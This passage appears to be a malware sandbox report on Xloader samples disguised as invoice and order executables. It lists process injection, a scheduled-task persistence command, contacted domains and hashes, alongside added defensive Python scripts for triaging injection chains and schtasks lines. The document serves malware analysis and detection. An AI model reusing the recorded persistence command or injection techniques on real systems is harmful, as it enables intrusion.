Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\NAPSTAT.EXE N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\NAPSTAT.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1292 wrote to memory of 2736 N/A C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe C:\Windows\SysWOW64\schtasks.exe
PID 1292 wrote to memory of 2736 N/A C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe C:\Windows\SysWOW64\schtasks.exe
PID 1292 wrote to memory of 2736 N/A C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe C:\Windows\SysWOW64\schtasks.exe
PID 1292 wrote to memory of 2736 N/A C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe C:\Windows\SysWOW64\schtasks.exe
PID 1292 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe
PID 1292 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe
PID 1292 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe
PID 1292 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe
PID 1292 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe
PID 1292 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe
PID 1292 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe
PID 1200 wrote to memory of 2656 N/A C:\Windows\Explorer.EXE C:\Windows\SysWOW64\NAPSTAT.EXE
PID 1200 wrote to memory of 2656 N/A C:\Windows\Explorer.EXE C:\Windows\SysWOW64\NAPSTAT.EXE
PID 1200 wrote to memory of 2656 N/A C:\Windows\Explorer.EXE C:\Windows\SysWOW64\NAPSTAT.EXE
PID 1200 wrote to memory of 2656 N/A C:\Windows\Explorer.EXE C:\Windows\SysWOW64\NAPSTAT.EXE

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe

"C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IlSblFRyVadI" /XML "C:\Users\Admin\AppData\Local\Temp\tmpFD33.tmp"

C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe

"{path}"

C:\Windows\SysWOW64\NAPSTAT.EXE

"C:\Windows\SysWOW64\NAPSTAT.EXE"

Network

N/A

Files

memory/1292-3-0x00000000005B0000-0x00000000005BA000-memory.dmp

memory/1292-2-0x0000000074C40000-0x000000007532E000-memory.dmp

memory/1292-1-0x0000000000160000-0x0000000000202000-memory.dmp

memory/1292-0-0x0000000074C4E000-0x0000000074C4F000-memory.dmp

memory/1292-4-0x0000000074C4E000-0x0000000074C4F000-memory.dmp

memory/1292-5-0x0000000074C40000-0x000000007532E000-memory.dmp

memory/1292-6-0x00000000055E0000-0x0000000005664000-memory.dmp

memory/1292-7-0x0000000004160000-0x0000000004190000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmpFD33.tmp

MD5 235df9cb13f0e61134099fa3131b4200
SHA1 03a5ee592b869bfebd8c9c586c0510d53e6b96a3
SHA256 279cb4ce033c1a0d71e0bae2156173a2d648c6c278f5b47bc64e332a702efa6a
SHA512 36b67e96bbab613f98f27d105607a58e82ea4048d536e8238b3119c3ae200ffaede642ac865918ef30027af51b86c037e57e3f3b3ee9be574993f72f577e1aaf

memory/3008-11-0x0000000000400000-0x0000000000429000-memory.dmp

memory/3008-13-0x0000000000400000-0x0000000000429000-memory.dmp

memory/3008-15-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/3008-18-0x0000000000400000-0x0000000000429000-memory.dmp

memory/3008-20-0x0000000000800000-0x0000000000B03000-memory.dmp

memory/1292-19-0x0000000074C40000-0x000000007532E000-memory.dmp

memory/3008-23-0x0000000000650000-0x0000000000661000-memory.dmp

memory/3008-22-0x0000000000400000-0x0000000000429000-memory.dmp

memory/1200-24-0x0000000006680000-0x0000000006752000-memory.dmp

memory/3008-27-0x0000000000B30000-0x0000000000B41000-memory.dmp

memory/1200-28-0x0000000006760000-0x000000000688C000-memory.dmp

memory/3008-26-0x0000000000400000-0x0000000000429000-memory.dmp

memory/1200-29-0x0000000006680000-0x0000000006752000-memory.dmp

memory/2656-31-0x0000000000DB0000-0x0000000000DF6000-memory.dmp

memory/2656-30-0x0000000000DB0000-0x0000000000DF6000-memory.dmp

memory/2656-32-0x0000000000080000-0x00000000000A9000-memory.dmp

memory/1200-33-0x0000000006760000-0x000000000688C000-memory.dmp

Analysis: behavioral29

Detonation Overview

Submitted

2024-11-21 20:24

Reported

2024-11-21 20:26

Platform

win10v2004-20241007-en

Max time kernel

149s

Max time network

153s

Command Line

C:\Windows\Explorer.EXE

Signatures

Xloader

loader xloader

Xloader family

xloader

Xloader payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\explorer.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\explorer.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4988 wrote to memory of 2840 N/A C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe C:\Windows\SysWOW64\schtasks.exe
PID 4988 wrote to memory of 2840 N/A C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe C:\Windows\SysWOW64\schtasks.exe
PID 4988 wrote to memory of 2840 N/A C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe C:\Windows\SysWOW64\schtasks.exe
PID 4988 wrote to memory of 4072 N/A C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe
PID 4988 wrote to memory of 4072 N/A C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe
PID 4988 wrote to memory of 4072 N/A C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe
PID 4988 wrote to memory of 4072 N/A C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe
PID 4988 wrote to memory of 4072 N/A C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe
PID 4988 wrote to memory of 4072 N/A C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe
PID 3508 wrote to memory of 756 N/A C:\Windows\Explorer.EXE C:\Windows\SysWOW64\explorer.exe
PID 3508 wrote to memory of 756 N/A C:\Windows\Explorer.EXE C:\Windows\SysWOW64\explorer.exe
PID 3508 wrote to memory of 756 N/A C:\Windows\Explorer.EXE C:\Windows\SysWOW64\explorer.exe
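The WriteProcessMemory tables of behavioral28 and behavioral29 are the only place this report shows who put code into whom, and they repeat one row per call. The script below is an added example, not part of the report: it collapses the rows, labels each distinct writer/target pair, walks the chain from the submitted sample, and lists writers that were never themselves written into. Two things a practitioner should keep in mind when reading its output: a parent's writes into a child it has just created (the rows into schtasks.exe) are what this sandbox lists for ordinary process creation as well, so they are not evidence of injection on their own; and Explorer.EXE (PID 1200 in the win7 run, 3508 in the win10 run) is the writer into NAPSTAT.EXE / the SysWOW64 explorer.exe yet has no recorded writer of its own, even though the Files list carries memory dumps from it. Whatever placed code in Explorer did not go through the hook that produced these rows. The rows embedded below are copied from the win7 table; the win10 table has the same shape with PIDs 4988, 4072, 2840, 3508 and 756.

```python
"""Rebuild the injection chain from the sandbox's WriteProcessMemory rows.
Added example for the behavioral28 / behavioral29 tables; it is not part of
the report and only consumes rows printed there."""
import re

# Row layout used by the report:
#   PID <src> wrote to memory of <dst> N/A <src image> <dst image>
# Image paths may contain spaces (the sample's does), so the greedy group
# takes everything up to the last " C:\" as the source image.
ROW_RE = re.compile(r"^PID (\d+) wrote to memory of (\d+) N/A (.+) (C:\\.+)$")

# Rows copied from the win7 table (PIDs 1292, 2736, 3008, 1200, 2656). The
# sandbox prints one row per call; two copies of each are kept to show the
# collapsing.
ROWS = r"""
PID 1292 wrote to memory of 2736 N/A C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe C:\Windows\SysWOW64\schtasks.exe
PID 1292 wrote to memory of 2736 N/A C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe C:\Windows\SysWOW64\schtasks.exe
PID 1292 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe
PID 1292 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe
PID 1200 wrote to memory of 2656 N/A C:\Windows\Explorer.EXE C:\Windows\SysWOW64\NAPSTAT.EXE
"""


def parse_writes(text):
    """Collapse rows into {(src_pid, dst_pid): [src_image, dst_image, calls]}."""
    edges = {}
    for line in text.strip().splitlines():
        m = ROW_RE.match(line)
        if not m:
            raise ValueError(f"unexpected row: {line!r}")
        src, dst, src_img, dst_img = m.groups()
        entry = edges.setdefault((int(src), int(dst)), [src_img, dst_img, 0])
        entry[2] += 1
    return edges


def is_windows_image(path):
    return path.lower().startswith("c:\\windows\\")


def label_edges(edges):
    """Give every distinct (writer, target) pair a triage label and its call count."""
    labels = {}
    for key, (src_img, dst_img, calls) in edges.items():
        if src_img.lower() == dst_img.lower():
            kind = "self-image write (hollowing candidate)"
        elif is_windows_image(src_img) and is_windows_image(dst_img):
            kind = "system process writing into system process"
        elif is_windows_image(dst_img):
            kind = "user binary writing into system process"
        else:
            kind = "other"
        labels[key] = (kind, calls)
    return labels


def reachable_from(edges, root):
    """PIDs reachable from `root` along write edges (breadth first, root first)."""
    order, frontier = [root], [root]
    while frontier:
        cur = frontier.pop(0)
        for src, dst in edges:
            if src == cur and dst not in order:
                order.append(dst)
                frontier.append(dst)
    return order


def unexplained_writers(edges, sample_pid):
    """Writers that nobody is recorded writing into and that are not the sample:
    code reached them through something the WriteProcessMemory hook did not see."""
    writers = {src for src, _ in edges}
    targets = {dst for _, dst in edges}
    return sorted(writers - targets - {sample_pid})


if __name__ == "__main__":
    edges = parse_writes(ROWS)
    for (src, dst), (kind, calls) in label_edges(edges).items():
        print(f"{src} -> {dst}: {kind} [{calls} call(s)]")
    print("reachable from the sample:", reachable_from(edges, 1292))
    print("writers with no recorded writer:", unexplained_writers(edges, 1292))
```

Run against the win7 rows it reports 1292 -> 3008 as the self-image write (the Files list shows a fresh 0x400000-0x429000 image dumped from 3008), 1200 -> 2656 as a system-to-system write, and 1200 as the one writer nothing is recorded writing into. On a hunt the same logic applies to EDR process-access telemetry: edges whose writer is not the target's parent, and writers that appear from nowhere, are the ones worth pulling memory for.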

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe

"C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IlSblFRyVadI" /XML "C:\Users\Admin\AppData\Local\Temp\tmp1FB8.tmp"

C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe

"{path}"

C:\Windows\SysWOW64\explorer.exe

"C:\Windows\SysWOW64\explorer.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 219.194.19.2.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 136.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 212.20.149.52.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 107.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 www.knowunknow.com udp
US 104.18.217.221:80 www.knowunknow.com tcp
US 8.8.8.8:53 221.217.18.104.in-addr.arpa udp
US 8.8.8.8:53 www.sarrosh.com udp
US 8.8.8.8:53 www.apollorealtors.com udp
NL 212.32.237.92:80 www.apollorealtors.com tcp
US 8.8.8.8:53 92.237.32.212.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 www.suddennnnnnnnnnnn02.xyz udp
US 8.8.8.8:53 www.webdesigncharlestonsc.com udp
US 162.244.253.20:80 www.webdesigncharlestonsc.com tcp
US 8.8.8.8:53 20.253.244.162.in-addr.arpa udp
US 8.8.8.8:53 www.cacaolixir.com udp
US 3.33.130.190:80 www.cacaolixir.com tcp
US 8.8.8.8:53 190.130.33.3.in-addr.arpa udp
US 8.8.8.8:53 www.avaxbridgeapes.com udp
FR 13.32.145.56:80 www.avaxbridgeapes.com tcp
US 8.8.8.8:53 56.145.32.13.in-addr.arpa udp
US 8.8.8.8:53 www.palmsugar.biz udp
US 8.8.8.8:53 www.zvedaventeco.quest udp
US 8.8.8.8:53 www.724ototamir.com udp
US 8.8.8.8:53 www.tenlog001.xyz udp
US 8.8.8.8:53 www.dazalogistics.com udp
US 76.223.105.230:80 www.dazalogistics.com tcp
US 8.8.8.8:53 230.105.223.76.in-addr.arpa udp
US 8.8.8.8:53 udp
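The schtasks.exe lines in the Processes sections of behavioral28 and behavioral29 register the same task, Updates\IlSblFRyVadI, from an XML the loader dropped in the user's Temp directory (tmpFD33.tmp on win7, tmp1FB8.tmp on win10, with different hashes in the two Files lists). Two details are easy to miss: the Process column says C:\Windows\SysWOW64\schtasks.exe although the command line names System32, which is WOW64 file-system redirection and tells you the parent is a 32-bit process; and the Temp XML is gone once the task is registered, so the durable copies are the task file under C:\Windows\System32\Tasks and the TaskCache\Tree key. The checker below is an added example, not part of the report; the two schtasks command lines are copied from the Processes sections above, and the third, benign line is constructed for contrast.

```python
"""Triage of the schtasks.exe /Create lines recorded in behavioral28 and
behavioral29. Added example, not part of the report: it parses the command
lines printed above and says which artefacts to collect."""
import re

ARG_RE = re.compile(r'"([^"]*)"|(\S+)')
USER_TEMP_RE = re.compile(r"^[a-z]:\\users\\[^\\]+\\appdata\\local\\temp\\", re.I)
SWITCHES_WITH_VALUE = {"/tn", "/xml", "/tr", "/sc", "/st", "/sd", "/ru", "/rp",
                       "/mo", "/s", "/u", "/p", "/ri", "/du", "/rl"}

# Copied from the Processes sections above (win7 and win10 runs); the third
# line is a constructed benign task for contrast.
WIN7_CMD = r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IlSblFRyVadI" /XML "C:\Users\Admin\AppData\Local\Temp\tmpFD33.tmp"'
WIN10_CMD = r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IlSblFRyVadI" /XML "C:\Users\Admin\AppData\Local\Temp\tmp1FB8.tmp"'
BENIGN_CMD = r'schtasks.exe /Create /TN "Backup\Nightly" /TR "C:\Tools\backup.cmd" /SC DAILY /ST 02:00'


def split_args(cmdline):
    """Split a Windows command line on whitespace, keeping quoted arguments whole."""
    return [quoted or bare for quoted, bare in ARG_RE.findall(cmdline)]


def parse_schtasks(cmdline):
    """{switch: value} for a schtasks.exe call (True for value-less switches),
    or None when the command is some other program."""
    args = split_args(cmdline)
    if not args or not args[0].lower().endswith("schtasks.exe"):
        return None
    opts, i = {}, 1
    while i < len(args):
        key = args[i].lower()
        if key in SWITCHES_WITH_VALUE and i + 1 < len(args):
            opts[key] = args[i + 1]
            i += 2
        else:
            opts[key] = True
            i += 1
    return opts


def longest_consonant_run(s):
    """Length of the longest run of consonants; a crude 'not a word' signal."""
    best = cur = 0
    for ch in s.lower():
        cur = cur + 1 if ch.isalpha() and ch not in "aeiouy" else 0
        best = max(best, cur)
    return best


def triage(cmdline):
    """Why a /Create line deserves attention and where the task will live."""
    opts = parse_schtasks(cmdline)
    if opts is None or "/create" not in opts:
        return None
    name = opts.get("/tn", "")
    xml = opts.get("/xml", "")
    name = name if isinstance(name, str) else ""
    xml = xml if isinstance(xml, str) else ""
    reasons = []
    if USER_TEMP_RE.match(xml):
        reasons.append("task definition imported from an XML in the user's Temp directory")
    leaf = name.rsplit("\\", 1)[-1]
    if leaf.isalpha() and len(leaf) >= 8 and longest_consonant_run(leaf) >= 5:
        reasons.append("task name looks generated rather than chosen")
    return {
        "task_name": name,
        "xml_path": xml,
        "reasons": reasons,
        # The Temp XML is normally deleted right after registration; these are
        # the durable copies of the task definition.
        "artifacts": [
            "C:\\Windows\\System32\\Tasks\\" + name,
            "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\" + name,
        ],
    }


if __name__ == "__main__":
    for cmd in (WIN7_CMD, WIN10_CMD, BENIGN_CMD):
        print(triage(cmd))
```

Both report lines trip both checks; the benign line trips neither. The consonant-run test is deliberately weak and only there to rank, since legitimate installers also register tasks with /XML from Temp. The hashes of tmpFD33.tmp and tmp1FB8.tmp differ between the two runs, so they are per-run noise; the task name and the Temp-XML pattern are what survive across detonations.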

Files

memory/4988-0-0x0000000074D5E000-0x0000000074D5F000-memory.dmp

memory/4988-1-0x0000000000740000-0x00000000007E2000-memory.dmp

memory/4988-2-0x00000000056D0000-0x0000000005C74000-memory.dmp

memory/4988-3-0x00000000051C0000-0x0000000005252000-memory.dmp

memory/4988-4-0x0000000005260000-0x00000000052FC000-memory.dmp

memory/4988-5-0x0000000074D50000-0x0000000075500000-memory.dmp

memory/4988-6-0x0000000005190000-0x000000000519A000-memory.dmp

memory/4988-7-0x00000000055B0000-0x00000000055BA000-memory.dmp

memory/4988-8-0x0000000074D5E000-0x0000000074D5F000-memory.dmp

memory/4988-9-0x0000000074D50000-0x0000000075500000-memory.dmp

memory/4988-10-0x00000000081B0000-0x0000000008234000-memory.dmp

memory/4988-11-0x0000000006F10000-0x0000000006F40000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmp1FB8.tmp

MD5 9c5f354653322ec06ab4ebb449e2437b
SHA1 375d5329debbebcf8688639c7ef7981aa77f5534
SHA256 8c6ac426262941b59edd01a7e5999cc822f25e8ef4cd9bf5d40e63f00d32faf2
SHA512 a97317b55c144fdc08a91c69fef2d40098991ab13a45ceecbd75eabba357ec9f41612b5b1bcc7b4c8e27875b74a6e0ca7019ca8a610eaae2e9de7eb5223f6175

memory/4072-15-0x0000000000400000-0x0000000000429000-memory.dmp

memory/4988-17-0x0000000074D50000-0x0000000075500000-memory.dmp

memory/4072-18-0x0000000001710000-0x0000000001A5A000-memory.dmp

memory/4072-20-0x0000000000400000-0x0000000000429000-memory.dmp

memory/4072-21-0x0000000001690000-0x00000000016A1000-memory.dmp

memory/3508-22-0x0000000003D40000-0x0000000003DEF000-memory.dmp

memory/4072-25-0x0000000003410000-0x0000000003421000-memory.dmp

memory/3508-26-0x0000000007A00000-0x0000000007B10000-memory.dmp

memory/4072-24-0x0000000000400000-0x0000000000429000-memory.dmp

memory/3508-27-0x0000000003D40000-0x0000000003DEF000-memory.dmp

memory/756-28-0x0000000000B10000-0x0000000000F43000-memory.dmp

memory/756-30-0x0000000000B10000-0x0000000000F43000-memory.dmp

memory/756-31-0x0000000001250000-0x0000000001279000-memory.dmp

memory/3508-32-0x0000000007A00000-0x0000000007B10000-memory.dmp

memory/3508-36-0x0000000007ED0000-0x0000000008042000-memory.dmp

Analysis: behavioral24

Detonation Overview

Submitted

2024-11-21 20:24

Reported

2024-11-21 20:26

Platform

win7-20240903-en

Max time kernel

118s

Max time network

123s

Command Line

"C:\Users\Admin\AppData\Local\Temp\New order 003848848575 02162022.exe"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Hide Artifacts: Ignore Process Interrupts

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 (LUID 33 = SeIncreaseWorkingSetPrivilege) N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 (LUID 34 = SeTimeZonePrivilege) N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 (LUID 35 = SeCreateSymbolicLinkPrivilege) N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\New order 003848848575 02162022.exe

"C:\Users\Admin\AppData\Local\Temp\New order 003848848575 02162022.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

